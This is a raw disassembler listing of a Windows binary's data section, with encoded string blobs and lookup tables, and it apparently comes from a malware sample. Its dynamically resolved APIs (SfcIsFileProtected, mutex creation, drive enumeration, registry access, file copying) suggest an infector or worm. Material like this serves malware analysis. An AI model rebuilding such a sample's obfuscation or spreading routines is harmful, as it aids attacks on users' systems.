; DATA XREF: sub_439DC4+3�o
dd 1B77E1E1h, 505215B0h, 0D24B6456h, 3D357C6Bh, 280E85D5h
dd 1AB051F9h, 1E4E8744h, 0E383CCDFh, 323D4737h, 14F80518h
dd 6E0637BFh
dword_44A350 dd 0 ; DATA XREF: sub_43AF47+2F1�w
; sub_43AF47+395�w ...
off_44A354 dd offset sub_440CD0 ; DATA XREF: sub_43C5EA+5C3�o
dd offset sub_43EF4B
dd offset sub_43EBBF
dd offset sub_43C1A7
dd offset sub_43F9EE
dd offset sub_440294
dd offset sub_43CE89
dword_44A370 dd 0 ; DATA XREF: sub_439B7B+FE�w
; sub_43A974+10�r ...
off_44A374 dd offset sub_4395B8 ; DATA XREF: .data:off_44A390�o
dd offset sub_4395A1
dd offset sub_440EC1
dd offset sub_43CC7F
dd offset sub_439DBC
dd offset sub_43C06B
dd offset sub_440EE8
off_44A390 dd offset off_44A374 ; DATA XREF: sub_439857+B8�o
; sub_43D6B1+138�o
dword_44A394 dd 0 ; DATA XREF: sub_439857+2F�r
; sub_439857+6C�r ...
off_44A398 dd offset sub_43C48C ; DATA XREF: .data:off_44A3B4�o
dd offset sub_43C1AF
dd offset sub_43CE60
dd offset sub_43EF43
dd offset sub_43B61A
dd offset sub_439633
dd offset sub_439857
off_44A3B4 dd offset off_44A398 ; DATA XREF: sub_43D6B1:loc_43D869�o
dword_44A3B8 dd 0FFFFFFFFh ; DATA XREF: sub_438348+3A�r
dd 2Ah dup(0FFFFFFFFh), 3Eh, 3 dup(0FFFFFFFFh), 3Fh, 34h
dd 35h, 36h, 37h, 38h, 39h, 3Ah, 3Bh, 3Ch, 3Dh, 7 dup(0FFFFFFFFh)
dd 0
dd 1, 2, 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Ch, 0Dh, 0Eh
dd 0Fh, 10h, 11h, 12h, 13h, 14h, 15h, 16h, 17h, 18h, 19h
dd 6 dup(0FFFFFFFFh), 1Ah, 1Bh, 1Ch, 1Dh, 1Eh, 1Fh, 20h
dd 21h, 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 2Ah, 2Bh
dd 2Ch, 2Dh, 2Eh, 2Fh, 30h, 31h, 32h, 33h, 85h dup(0FFFFFFFFh)
off_44A7B8 dd offset loc_4383BF ; DATA XREF: sub_438348+70�r
dd offset loc_4383C7
dd offset loc_43840D
dd offset loc_43844B
aCreatethread db 'CreateThread',0 ; DATA XREF: sub_43A5C3+2E8�o
aEntercriticals db 'EnterCriticalSection',0 ; DATA XREF: sub_43A5C3+2FB�o
aInitializecrit db 'InitializeCriticalSection',0 ; DATA XREF: sub_43A5C3+30E�o
aLeavecriticals db 'LeaveCriticalSection',0 ; DATA XREF: sub_43A5C3+322�o
align 4
dword_44A81C dd 2ED40000h, 61746164h ; DATA XREF: sub_440F46+7E7�o
db 0
byte_44A825 db 4, 0, 0F2h ; DATA XREF: sub_440DA6+55�o
aUb_0 db 'ܜ',0
byte_44A82D db 1, 0, 9Ch ; DATA XREF: sub_440DA6+29�o
db 0C0h, 0
word_44A832 dw 0 ; DATA XREF: sub_440D4B+3C�o
aPsfcisfileprot db 'SfcIsFileProtected',0
dword_44A848 dd 738B0000h, 642E6366h ; DATA XREF: sub_440D4B+1C�o
db 2 dup(6Ch), 0
byte_44A853 db 0 ; DATA XREF: sub_440D4B+1�o
dd 6673A200h, 6C642E63h
db 6Ch, 0
word_44A85E dw 4 ; DATA XREF: sub_440B97+56�o
aS?_0 db 'S}=? ',0
word_44A866 dw 1 ; DATA XREF: sub_440B97+2A�o
db 0CBh, 97h, 0
byte_44A86B db 4 ; DATA XREF: sub_440AF2+6F�o
dd 5F547100h
db 43h, 29h, 0
byte_44A873 db 1 ; DATA XREF: sub_440AF2:loc_440B4F�o
dd 89AC00h
dword_44A878 dd 40650002h ; DATA XREF: sub_440AF2:loc_440B30�o
db 6, 0
word_44A87E dw 1 ; DATA XREF: sub_440511+306�o
db 4Ch, 6Fh, 0
byte_44A883 db 1 ; DATA XREF: sub_440511+2B4�o
dd 0F3D000h
dword_44A888 dd 0D9FA0001h ; DATA XREF: sub_440511+236�o
db 0
byte_44A88D db 7, 0, 0E1h ; DATA XREF: sub_440511+212�o
aIxxs db '',0
dword_44A898 dd 9FBC0001h ; DATA XREF: sub_440511+1D0�o
db 0
byte_44A89D db 7, 0, 43h ; DATA XREF: sub_440511:loc_440632�o
a773yll db '+773yll',0
dword_44A8A8 dd 0F596042Bh, 0FEF5F3FEh, 0E4E6F8F3h, 0B8E5E5F3h, 0F9F0F8FFh
; DATA XREF: sub_440511+10�o
dd 0FAF9F1B5h, 0FAF9E6F2h, 0F9F5B8FAh, 0F8FFB5FBh, 0FAF9F1E2h
dd 0F9F5B8F2h, 0E1E1B5FBh, 0F4F5B8E1h, 0E3E4B8E4h, 0E1E1E1B5h
dd 0F5F9E5B8h, 0F7B8E5FDh, 0E2E5B5F5h, 0E6FBE4F9h, 0F5B8EFF7h
dd 0F5B5FBF9h, 0F9E2E3E4h, 0E3F8B8E6h, 0E1F3F8B5h, 0F1F1F3B8h
dd 0FBF9F5B8h, 0E1E1E1B5h, 0F8F9E6B8h, 0F5E5FFECh, 0B8E5FBF7h
dd 0B5FBF9F5h, 0F5FAF3E1h, 0A5F3FBF9h, 0FFFBE5B8h, 0F5B8F3FAh
dd 0FDE3B8F9h, 0F4FAF9B5h, 0F7F8B8A4h, 0F8F9FFE2h, 0F5B8E2F3h
dd 0E1B5FBF9h, 0F4B8E1E1h, 0B8F8FFF4h, 0FBB5E3E4h, 0F3E2E5F7h
dd 0B8EEBBE4h, 0B5FBF9F5h, 0B8E1E1E1h, 0ECF8F9E6h, 0F7F5E5FFh
dd 0F5B8E5FBh, 0E1B5FBF9h, 0F4B8E1E1h, 0BBFDF8F7h, 0E7F8F7F4h
dd 0F5BBF3E3h, 0F2F7F8F7h, 0F7F5B8F7h, 0E1E1E1B5h, 0F8F9E6B8h
dd 0F5E5FFECh, 0B8E5FBF7h, 0B5FBF9F5h, 0B8E1E1E1h, 0B8F9FBF4h
dd 0B5FBF9F5h, 0E6EFF7E6h, 0F5B8FAF7h, 0F3B5FBF9h, 0B8EFF7F4h
dd 0B5FBF9F5h, 0B8E1E1E1h, 0FDF8F7F4h, 0F7FBF0F9h, 0F7E4E3F2h
dd 0FBF9F5B8h, 0E1E1E1B5h, 0F4FFF5B8h, 0F9F5B8F5h, 0E1E1B5FBh
dd 0E2E0B8E1h, 0E3E4B8F4h, 0E1E1E1B5h, 0F4E1F5B8h, 0B8FDF8F7h
dd 0B5FBF9F5h, 0F2FAF9F1h, 0FAFAF9E6h, 0FBF9F5B8h, 0E1E1E1B5h
dd 0F8F9E6B8h, 0F5E5FFECh, 0B8E5FBF7h, 0B5FBF9F5h, 0B8E1E1E1h
dd 0F7F4FBFBh, 0E4B8FDF8h, 0E1E1B5E3h, 0F8E3B8E1h, 0E2E5F7FFh
dd 0B8FBE3E4h, 0F1B5E3E4h, 0E6F2FAF9h, 0B8FAFAF9h, 0B5FBF9F5h
dd 0B8E1E1E1h, 0ECF8F9E6h, 0F7F5E5FFh, 0F5B8E5FBh, 0E1B5FBF9h
dd 0E1B8E1E1h, 0F2FAE4F9h, 0FDF8F7F4h, 0F1E4F9B8h, 0E1E1E1B5h
dd 0F8F7F5B8h, 0F7F2FFF2h, 0F3E0F3E2h, 0FFF0FFE4h, 0F5B8E4F3h
dd 0E1B5FBF9h, 0E6B8E1E1h, 0FFECF8F9h, 0FBF7F5E5h, 0F9F5B8E5h
dd 0E1E1B5FBh, 0F7F4B8E1h, 0F0F9FDF8h, 0FFF2F8FFh, 0F9F5B8F7h
dd 0E1E1B5FBh, 0F5FFB8E1h, 0FDF8F7F4h, 0B5E3E4B8h, 0FDF8F7F4h
dd 0B8F1F8FFh, 0FFFAF7FEh, 0BBEEF7F0h, 0FFFAF8F9h, 0F5B8F3F8h
dd 0FDE3B8F9h, 0E1E1E1B5h, 0F8F3E0B8h, 0E5E4F9F2h, 0F3FBF7F8h
dd 0B5E5E1B8h, 0B8E1E1E1h, 0B8F4FBFDh, 0E1B5E3E4h, 0F8B8E1E1h
dd 0F7FBE2F3h, 0E2E5FFF1h, 0F5B8E4F3h, 0FDB5FBF9h, 0F7FDE0F7h
dd 0F8F3F5ECh, 0B8E4F3E2h, 0B5FBF9F5h, 0B8E1E1E1h, 0F2F8F3E0h
dd 0F8E5E4F9h, 0B8F3FBF7h, 0FBB5E5E1h, 0FAF8F9EFh, 0F7F3F8FFh
dd 0E3F9F5F5h, 0A4E5E2F8h, 0F4F4F7B8h, 0F7F8EFF3h, 0F8F9FFE2h
dd 0F5B8FAF7h, 0FDE3B8F9h, 0FAF8F9B5h, 0BBF3F8FFh, 0FFE5E3F4h
dd 0E5E5F3F8h, 0F9FAFAB8h, 0E2E5F2EFh, 0F5B8F4E5h, 0FDE3B8F9h
dd 0E1E1E1B5h, 0FAFAF7B8h, 0F4F7FEF7h, 0F7F4F2F7h, 0F5B8FDF8h
dd 0E1B5FBF9h, 0E4B8E1E1h, 0F5B8F5F4h, 0E1B5FBF9h, 0E6B8E1E1h
dd 0FFECF8F9h, 0FBF7F5E5h, 0F9F5B8E5h, 0E1E1B5FBh, 0FEB8A7E1h
dd 0B8F5F4E5h, 0FDB5F7F5h, 0F3E4F4F1h, 0F5EEF7FAh, 0B8F4E3FAh
dd 0EFB5E3E4h, 0F9F4FBF7h, 0ECFFF4B8h, 0F2FFFDB5h, 0F4BBE5F9h
dd 0B8FDF8F7h, 0E1B5E3E4h, 0FAB8E1E1h, 0FFF2F5F4h, 0E2F5F3E4h
dd 0E3F7FAB8h, 0E2F8F3E4h, 0F4F8F7FFh, 0B8FDF8F7h, 0F4B5F7F5h
dd 0FAF5E4F7h, 0B8E5EFF7h, 0B5FBF9F5h, 0F7E2F9E2h, 0F0EFFAFAh
dd 0F4F3F3E4h, 0FFFDF8F7h, 0F5B8F1F8h, 0E1B5FBF9h, 0F8B8E1E1h
dd 0F5B8F5F4h, 0A5A3B5F7h, 0FDF8F7F4h, 0FBF9F5B8h, 0E1E1E1B5h
dd 0F8F3E0B8h, 0E5E4F9F2h, 0F3FBF7F8h, 0B5E5E1B8h, 0B8E1E1E1h
dd 0BBF4A4F4h, 0E5E3E4E2h, 0F9F5B8E2h, 0E1E1B5FBh, 0F3E0B8E1h
dd 0E4F9F2F8h, 0FBF7F8E5h, 0E5E1B8F3h, 0F3E6F9B5h, 0F8F7F4F8h
dd 0F9F5B8FDh, 0F7E2B5FBh, 0F3F8BBE2h, 0F7F4E2F0h, 0E4B8FDF8h
dd 0F3E5B5E3h, 0F4F7FAF5h, 0B5E3E4B8h, 0E3F5F3E5h, 0EFE2FFE4h
dd 0B8F4F7FAh, 0F0B5E3E4h, 0F7FEE2F3h, 0F4B8F2E4h, 0F1B5ECFFh
dd 0EEF8F9E4h, 0F8F7FAE6h, 0B8E5E2F3h, 0E0B5E3E4h, 0F9F2F8F3h
dd 0F7F8E5E4h, 0E1B8F3FBh, 0B5E5h
dword_44ACD8 dd 4, 0F000B2h, 0F600FDh, 0EBh ; DATA XREF: sub_44006A+27�o
dword_44ACE8 dd 3E1E0001h ; DATA XREF: sub_43F9F6:loc_43FEDE�o
db 0
byte_44ACED db 2 dup(0), 15h ; DATA XREF: sub_43F9F6+49F�o
db 0
byte_44ACF1 db 13h, 0, 47h ; DATA XREF: sub_43F9F6+47A�o
db 12h
aG3G235__0 db ')&%+"g3(g&23/(5.="',0
a5_0 db '5',0 ; DATA XREF: sub_43F9F6+46A�o
dw 0A2F7h
aScxitGsCvgqseu db '׃זקקה',0
byte_44AD41 db 1, 0, 0A3h ; DATA XREF: sub_43F9F6:loc_43FCAD�o
db 8Eh, 0
word_44AD46 dw 1Eh ; DATA XREF: sub_43F9F6+272�o
db 0Ch
db 5Ch, 60h, 69h
db 6Dh ; m
db 7Fh, 69h, 20h
db 2Ch ; ,
db 7Fh, 69h, 60h
aIoxItEMxecbU_0 db 'iox,It|e~mxecb,Uim~',0
dword_44AD68 dd 10300001h ; DATA XREF: sub_43F9F6:loc_43FBF9�o
db 0
byte_44AD6D db 1Fh, 0, 9Ah ; DATA XREF: sub_43F9F6+1BE�o
dd 0FBFFF6CAh, 0BAB6FFE9h, 0FFF6FFE9h, 0DFBAEEF9h, 0E8F3EAE2h
dd 0F5F3EEFBh, 0F5D7BAF4h, 0F2EEF4h
dword_44AD90 dd 77520004h, 0A6A62h ; DATA XREF: sub_43F85A+69�o
dword_44AD98 dd 5C100000h ; DATA XREF: sub_43F5E2+2D�o
db 0
byte_44AD9D db 1, 0, 0F8h ; DATA XREF: sub_43F3B6+1B0�o
db 0D2h, 0
word_44ADA2 dw 4 ; DATA XREF: sub_43F3B6+95�o
db ')-)))',0
asc_44ADAA db 9,0 ; DATA XREF: sub_43F189+16B�o
dd 0F123060h, 14031504h
db 29h, 4, 0
byte_44ADB7 db 29h ; DATA XREF: sub_43F189+15B�o
dd 9C80D300h, 92848795h, 9E8F9681h, 0BCA1B0BAh, 0A7B5BCA0h
dd 0BDBA848Fh, 0A0A4BCB7h, 0A1A6908Fh, 0A7BDB6A1h, 0A0A1B685h
dd 0BDBCBAh
dword_44ADE4 dd 755B0001h ; DATA XREF: sub_43F189+13F�o
db 0
byte_44ADE9 db 4, 0, 65h ; DATA XREF: sub_43F189+DA�o
aH@K db 'H@=K',0
byte_44ADF1 db 3, 0, 8Bh ; DATA XREF: sub_43F189+9C�o
dd 0D7B1E8h
dword_44ADF8 dd 0ECC90008h, 0BCECE7BCh, 0BCECE7h ; DATA XREF: sub_43F189:loc_43F1ED�o
dword_44AE04 dd 612F0002h ; DATA XREF: sub_43F189+4F�o
db 7Bh, 0
word_44AE0A dw 2 ; DATA XREF: sub_43F189+31�o
dd 86E7DEh
dword_44AE10 dd 73150000h, 70637274h ; DATA XREF: sub_43EF62+19F�o
db 79h, 0
word_44AE1A dw 0 ; DATA XREF: sub_43EF62+183�o
aVsprintf db 'vsprintf',0
word_44AE26 dw 0 ; DATA XREF: sub_43EF62+167�o
aZsprintf db 'sprintf',0
byte_44AE31 db 2 dup(0), 0B6h ; DATA XREF: sub_43EF62+14B�o
aStrcat db 'strcat',0
byte_44AE3B db 0 ; DATA XREF: sub_43EF62+12F�o
dd 72731B00h, 646E61h
dword_44AE44 dd 72C00000h, 646E61h ; DATA XREF: sub_43EF62+113�o
dword_44AE4C dd 6D100000h, 65736D65h ; DATA XREF: sub_43EF62+F7�o
db 74h, 0
word_44AE56 dw 0 ; DATA XREF: sub_43EF62+DB�o
a4memcpy db '4memcpy',0
dword_44AE60 dd 6D930000h, 6D636D65h ; DATA XREF: sub_43EF62+BF�o
db 70h, 0
word_44AE6A dw 0 ; DATA XREF: sub_43EF62+A3�o
aTmalloc db 'tmalloc',0
dword_44AE74 dd 66CD0000h, 656572h ; DATA XREF: sub_43EF62+87�o
dword_44AE7C dd 61C20000h, 696F74h ; DATA XREF: sub_43EF62+6B�o
dword_44AE84 dd 74E50000h, 7070756Fh ; DATA XREF: sub_43EF62+4F�o
db 65h, 72h, 0
byte_44AE8F db 0 ; DATA XREF: sub_43EF62:loc_43EF95�o
dd 735F1400h, 7065656Ch
db 0
byte_44AE99 db 2 dup(0), 0Eh ; DATA XREF: sub_43EF62+1C�o
aCrtdll_dll db 'crtdll.dll',0
byte_44AEA7 db 0 ; DATA XREF: sub_43EF62+1�o
dd 7263E200h, 6C6C6474h, 6C6C642Eh
db 0
byte_44AEB5 db 2 dup(0), 20h ; DATA XREF: sub_43EC0A+1EB�o
aKkqVx_0 db 'kkq-vx',0
byte_44AEBF db 0 ; DATA XREF: sub_43EC0A+1DB�o
dd 6B6B6D00h, 78762D71h
db 0
byte_44AEC9 db 2 dup(0), 0C3h ; DATA XREF: sub_43EC0A+15D�o
aKkqVx_1 db 'kkq-vx',0
byte_44AED3 db 0 ; DATA XREF: sub_43EC0A+F3�o
dd 6B6B1C00h, 78762D71h
db 0
byte_44AEDD db 2 dup(0), 7 ; DATA XREF: sub_43EC0A+E3�o
aS_mtxU db '%s_mtx%u',0
byte_44AEE9 db 2 dup(0), 0D0h ; DATA XREF: sub_43EC0A+B1�o
aKkqVx_2 db 'kkq-vx',0
byte_44AEF3 db 0 ; DATA XREF: sub_43EC0A+A1�o
dd 7325CC00h, 78746D5Fh
db 31h, 0
word_44AEFE dw 16h ; DATA XREF: sub_43DB8B+DF2�o
aTbolbiNmbzNB_0 db '⡎¶¡',0
dword_44AF18 dd 7A380006h, 776C6C6Dh ; DATA XREF: sub_43DB8B+DE2�o
db 76h, 0
word_44AF22 dw 1Eh ; DATA XREF: sub_43DB8B+D44�o
dd 545C4104h, 5045564Dh, 244A4B4Dh, 41504540h, 450E0E0Eh
dd 54244950h, 47244A4Dh, 41404Bh
dword_44AF44 dd 580B0006h, 425F4A5Fh ; DATA XREF: sub_43DB8B+D34�o
db 48h, 0
word_44AF4E dw 0 ; DATA XREF: sub_43DB8B+C74�o
db 0B8h, 0
word_44AF52 dw 4 ; DATA XREF: sub_43DB8B+C64�o
aIcl_0 db 'ߚ',0
word_44AF5A dw 6 ; DATA XREF: sub_43DB8B+BDF�o
dd 0E0F5F7C5h, 0B0F7EBh
dword_44AF64 dd 0A0850004h, 0F0B7ABh ; DATA XREF: sub_43DB8B:loc_43E710�o
dword_44AF6C dd 0B40000h ; DATA XREF: sub_43DB8B+ABC�o
dword_44AF70 dd 16550008h, 1A17181Ah, 0D1A17h ; DATA XREF: sub_43DB8B+AAC�o
dword_44AF7C dd 8E0000h ; DATA XREF: sub_43DB8B+9FA�o
dword_44AF80 dd 5A190008h, 565B5456h, 41565Bh ; DATA XREF: sub_43DB8B+9EA�o
dword_44AF8C dd 41120006h, 5B465346h ; DATA XREF: sub_43DB8B+8DD�o
db 51h, 0
word_44AF96 dw 6Eh ; DATA XREF: sub_43DB8B:loc_43E442�o
db 43h ; C
db 16h, 2Dh, 22h
db 21h ; !
db 2Fh, 26h, 63h
db 37h ; 7
db 2Ch, 63h, 22h
db 36h ; 6
db 37h, 2Bh, 2Ch
db 31h ; 1
db 2Ah, 39h, 26h
db 6Dh ; m
db 49h, 66h, 30h
db 63h ; c
db 33h, 31h, 2Ch
db 20h
db 26h, 2 dup(30h)
db 2Ah ; *
db 2Dh, 24h, 63h
db 20h
db 26h, 2Dh, 37h
db 26h ; &
db 31h, 63h, 2Ah
db 30h ; 0
db 63h, 36h, 2Dh
db 22h ; "
db 21h, 2Fh, 26h
db 63h ; c
db 37h, 2Ch, 63h
db 22h ; "
db 36h, 37h, 2Bh
db 2Ch ; ,
db 31h, 2Ah, 39h
db 26h ; &
db 63h, 3Ah, 2Ch
db 36h ; 6
db 31h, 63h, 20h
db 22h ; "
db 31h, 27h, 63h
db 66h ; f
db 30h, 6Dh, 49h
db 0Eh
aC1170cC71CM_0 db '"(&c ,11& 7*,-0c"-',27h,'c71:c"$"*-m',0
aM_0: ; DATA XREF: sub_43DB8B:loc_43E42A�o
dw 0Ah
unicode 0, <M>
dd 28393E2Ch, 3F2C0E3Fh
db 29h, 0
word_44B016 dw 4 ; DATA XREF: sub_43DB8B+885�o
dd 0E140B5Dh
db 1Ch, 0
word_44B01E dw 1 ; DATA XREF: sub_43DB8B+7C2�o
db 42h, 62h, 0
byte_44B023 db 6 ; DATA XREF: sub_43DB8B+7B2�o
dd 2D2A7900h, 3A302D38h
db 0
byte_44B02D db 2 dup(0), 92h ; DATA XREF: sub_43DB8B+690�o
db 0
byte_44B031 db 6, 0, 76h ; DATA XREF: sub_43DB8B+680�o
a7?5 db '%"7"?5',0
byte_44B03B db 15h ; DATA XREF: sub_43DB8B+5F8�o
db 0
aFlfff6455F_0 db 'flFFF64)%#55/(!F ',27h,'/*#"',0
dword_44B054 dd 0D5E0006h, 170A1F0Ah ; DATA XREF: sub_43DB8B+5E8�o
db 1Dh, 0
word_44B05E dw 6 ; DATA XREF: sub_43DB8B+4D9�o
aB3o4_0 db 'B))3o4:',0
asc_44B068 db 8,0 ; DATA XREF: sub_43DB8B+46E�o
aIAgI_0 db '̉',0
asc_44B074 db 9,0 ; DATA XREF: sub_43DB8B:loc_43DFDD�o
dw 0C480h
dd 0E2CFE3EFh, 0F4E3E5EAh
db 0
byte_44B081 db 0Eh, 0, 0D4h ; DATA XREF: sub_43DB8B+426�o
aAGGcZz_0 db '',0
byte_44B093 db 4 ; DATA XREF: sub_43D8DE+56�o
dd 0F4B49A00h
db 0F6h, 0E9h, 0
byte_44B09B db 1 ; DATA XREF: sub_43D8DE+2A�o
dd 0FBA700h
dword_44B0A0 dd 25030000h, 5C732573h ; DATA XREF: sub_43D357+31C�o
db 0
byte_44B0A9 db 5, 0, 2Bh ; DATA XREF: sub_43D357+2AB�o
dd 580E580Eh
db 77h, 0
word_44B0B2 dw 0 ; DATA XREF: sub_43D357+C1�o
aUS db '%s*',0
byte_44B0B9 db 4, 0, 8Fh ; DATA XREF: sub_43D357+73�o
aK_0 db '',0
align 4
asc_44B0C4: ; DATA XREF: sub_43D058+1D2�o
dw 9
unicode 0, <>,0
aZagkAalb:
unicode 0, <ŧ>,0
a_ db '_',0 ; DATA XREF: sub_43D058+12A�o
aIu_iTyi_TyiT_0 db 'Iu $.i> -=!tyi!, .!=tyi+&;-,;tyi:;*t!==9sffl:v!tl:o tl<l:o&tl<o/t'
db 'l*o: tl:o:&tl<o=%tl<o?tl<o-tl:w',0
asc_44B141 db ',',0 ; DATA XREF: sub_43D058+D5�o
aBAAnaAnaAnaA_0 db 'ڝՀɀπހΒۀރ',0
asc_44B171 db 7,0 ; DATA XREF: sub_43D058+67�o
aNPnuP_0 db 'ӏӏ',0
dword_44B17C dd 417A0003h ; DATA XREF: sub_43C5EA+2F6�o
db 15h, 47h, 0
byte_44B183 db 4 ; DATA XREF: sub_43C5EA:loc_43C852�o
dd 337B4000h
db 2Fh, 7Dh, 0
byte_44B18B db 4 ; DATA XREF: sub_43C5EA+22D�o
dd 0ACF3C800h, 0E2F5h
dword_44B194 dd 3, 0F0046h, 1000Bh ; DATA XREF: sub_43C5EA+16�o
db 2 dup(0)
word_44B1A2 dw 0 ; DATA XREF: sub_43C26E:loc_43C2A1�o
aShgetfolderpat db 'SHGetFolderPathA',0
asc_44B1B6 db 0Bh,0 ; DATA XREF: sub_43C26E+1C�o
aMQuv db '',0
byte_44B1C5 db 2 dup(0), 0Eh ; DATA XREF: sub_43C26E+1�o
aShell32_dll db 'shell32.dll',0
dword_44B1D4 dd 47020000h, 73557465h, 614E7265h, 41656Dh ; DATA XREF: sub_43C1C6+87�o
dword_44B1E4 dd 520B0000h, 6C436765h, 4B65736Fh ; DATA XREF: sub_43C1C6+6B�o
db 65h, 79h, 0
byte_44B1F3 db 0 ; DATA XREF: sub_43C1C6+4F�o
dd 6552EF00h, 65755167h, 61567972h, 4565756Ch
db 78h, 41h, 0
byte_44B207 db 0 ; DATA XREF: sub_43C1C6:loc_43C1F9�o
dd 65529B00h, 65704F67h, 79654B6Eh, 417845h
dword_44B218 dd 6607000Ch, 77667163h, 2935346Eh, 6B6B63h ; DATA XREF: sub_43C1C6+1C�o
dword_44B228 dd 618E0000h, 70617664h, 2E323369h, 6C6C64h ; DATA XREF: sub_43C1C6+1�o
dword_44B238 dd 5C970000h ; DATA XREF: sub_43BD90:loc_43C02D�o
db 0
byte_44B23D db 5, 0, 6Fh ; DATA XREF: sub_43BA75+2C8�o
dd 4A331C4Ah
db 1Ch, 0
word_44B246 dw 5 ; DATA XREF: sub_43BA75+25A�o
dd 230C5A7Fh
db 5Ah, 0Ch, 0
byte_44B24F db 4 ; DATA XREF: sub_43BA75+17�o
dd 0F8AE8B00h
db 0D7h, 0A1h, 0
byte_44B257 db 4 ; DATA XREF: sub_43B982+55�o
dd 98D8F600h
db 9Ah, 85h, 0
byte_44B25F db 1 ; DATA XREF: sub_43B982+29�o
dd 792500h
dword_44B264 dd 450C0011h, 7E697862h, 2C786962h, 607C7449h, 7E697E63h
; DATA XREF: sub_43B912+24�o
db 0
off_44B279 dd offset loc_43FFFE+2 ; DATA XREF: sub_43B622:loc_43B8A9�o
byte_44B27D db 1, 0, 55h ; DATA XREF: sub_43B622:loc_43B831�o
db 2Dh, 0
word_44B282 dw 0 ; DATA XREF: sub_43B523:loc_43B57F�o
db 0E4h, 0
word_44B286 dw 0 ; DATA XREF: sub_43B4B3+4F�o
aGetstockobject db 'GetStockObject',0
dword_44B298 dd 43B00000h, 74616572h, 6E6F4665h ; DATA XREF: sub_43B4B3:loc_43B4E6�o
db 74h, 41h, 0
byte_44B2A7 db 9 ; DATA XREF: sub_43B4B3+1C�o
dd 292A4D00h, 637F7E24h, 212129h
dword_44B2B4 dd 67D70000h, 32336964h, 6C6C642Eh ; DATA XREF: sub_43B4B3+1�o
db 0
byte_44B2C1 db 2 dup(0), 0BFh ; DATA XREF: sub_43B3CC+A3�o
aIsequalguid db 'IsEqualGUID',0
dword_44B2D0 dd 436F0000h, 696E556Fh, 6974696Eh, 7A696C61h ; DATA XREF: sub_43B3CC+87�o
db 65h, 0
word_44B2E2 dw 0 ; DATA XREF: sub_43B3CC+6B�o
aCoinitialize db 'CoInitialize',0
word_44B2F2 dw 0 ; DATA XREF: sub_43B3CC+4F�o
dd 436F43F7h, 74616572h, 736E4965h, 636E6174h
db 65h, 0
word_44B306 dw 0 ; DATA XREF: sub_43B3CC:loc_43B3FF�o
aClsidfromstrin db 'CLSIDFromString',0
byte_44B319 db 2 dup(0), 61h ; DATA XREF: sub_43B3CC+1C�o
aOle32_dll db 'ole32.dll',0
word_44B326 dw 0 ; DATA XREF: sub_43B3CC+1�o
aOle32_dll_0 db 'ole32.dll',0
byte_44B333 db 4 ; DATA XREF: sub_43AF47+3D6�o
dd 0C08AA400h
db 0C5h, 0D0h, 0
byte_44B33B db 17h ; DATA XREF: sub_43ABE3:loc_43ADD7�o
dd 4C0A2F00h, 4C0A4C0Ah, 0A024C0Ah, 2 dup(0A4C0A4Ch), 404C014Ch
db 42h, 0
word_44B356 dw 16h ; DATA XREF: sub_43ABE3+1AE�o
dd 12541237h, 12541254h, 1A541254h, 2 dup(54125412h), 424519h
dword_44B370 dd 474C0000h, 6F4C7465h, 656C6163h, 6F666E49h ; DATA XREF: sub_43A105+499�o
db 41h, 0
word_44B382 dw 0 ; DATA XREF: sub_43A105+47D�o
aNgetversionexa db 'GetVersionExA',0
byte_44B393 db 0 ; DATA XREF: sub_43A105+461�o
dd 6946C500h, 6954656Ch, 6F54656Dh, 74737953h, 69546D65h
db 6Dh, 65h, 0
byte_44B3AB db 0 ; DATA XREF: sub_43A105+445�o
dd 6F43A600h, 7261706Dh, 6C694665h, 6D695465h
db 65h, 0
word_44B3BE dw 0 ; DATA XREF: sub_43A105+429�o
aTgetvolumeinfo db 'tGetVolumeInformationA',0
byte_44B3D7 db 0 ; DATA XREF: sub_43A105+40D�o
dd 6E497B00h, 6C726574h, 656B636Fh, 63654464h, 656D6572h
db 6Eh, 74h, 0
byte_44B3EF db 0 ; DATA XREF: sub_43A105+3F1�o
dd 6E49DF00h, 6C726574h, 656B636Fh, 636E4964h, 656D6572h
db 6Eh, 74h, 0
byte_44B407 db 0 ; DATA XREF: sub_43A105+3D5�o
dd 65477600h, 73795374h, 446D6574h, 63657269h, 79726F74h
db 41h, 0
word_44B41E dw 0 ; DATA XREF: sub_43A105+3B9�o
aAgetmodulefile db 'GetModuleFileNameA',0
dword_44B434 dd 4FE50000h, 4D6E6570h, 78657475h ; DATA XREF: sub_43A105+39D�o
db 41h, 0
word_44B442 dw 0 ; DATA XREF: sub_43A105+381�o
aScreatemutexa db 'CreateMutexA',0
word_44B452 dw 0 ; DATA XREF: sub_43A105+365�o
dd 706F43F7h, 6C694679h
db 65h, 41h, 0
byte_44B45F db 0 ; DATA XREF: sub_43A105+349�o
db 0
a_getdiskfreesp db '_GetDiskFreeSpaceA',0
dword_44B474 dd 53F20000h, 72457465h, 4D726F72h, 65646Fh ; DATA XREF: sub_43A105+32D�o
dword_44B484 dd 47E80000h, 78457465h, 6F437469h, 68546564h, 64616572h
; DATA XREF: sub_43A105+311�o
db 0
byte_44B499 db 2 dup(0), 0CBh ; DATA XREF: sub_43A105+2F5�o
aGetdrivetypea db 'GetDriveTypeA',0
word_44B4AA dw 0 ; DATA XREF: sub_43A105+2D9�o
aZfindclose db 'zFindClose',0
byte_44B4B7 db 0 ; DATA XREF: sub_43A105+2BD�o
dd 69461E00h, 654E646Eh, 69467478h, 41656Ch
dword_44B4C8 dd 46610000h, 46646E69h, 74737269h, 656C6946h ; DATA XREF: sub_43A105+2A1�o
db 41h, 0
word_44B4DA dw 0 ; DATA XREF: sub_43A105+285�o
aMgettickcount db 'GetTickCount',0
word_44B4EA dw 0 ; DATA XREF: sub_43A105+269�o
aZrtlzeromemory db 'RtlZeroMemory',0
byte_44B4FB db 0 ; DATA XREF: sub_43A105+24D�o
dd 65470800h, 73795374h, 546D6574h, 656D69h
dword_44B50C dd 4C8F0000h, 6C61636Fh, 65657246h ; DATA XREF: sub_43A105+231�o
db 0
byte_44B519 db 2 dup(0), 72h ; DATA XREF: sub_43A105+215�o
aLocalalloc db 'LocalAlloc',0
byte_44B527 db 0 ; DATA XREF: sub_43A105+1F9�o
dd 69567600h, 61757472h, 6572466Ch
db 65h, 0
word_44B536 dw 0 ; DATA XREF: sub_43A105+1DD�o
aGvirtualalloc db 'VirtualAlloc',0
word_44B546 dw 0 ; DATA XREF: sub_43A105+1C1�o
a8readfile db '8ReadFile',0
word_44B552 dw 0 ; DATA XREF: sub_43A105+1A5�o
aGettemppatha db 'GetTempPathA',0
word_44B562 dw 0 ; DATA XREF: sub_43A105+189�o
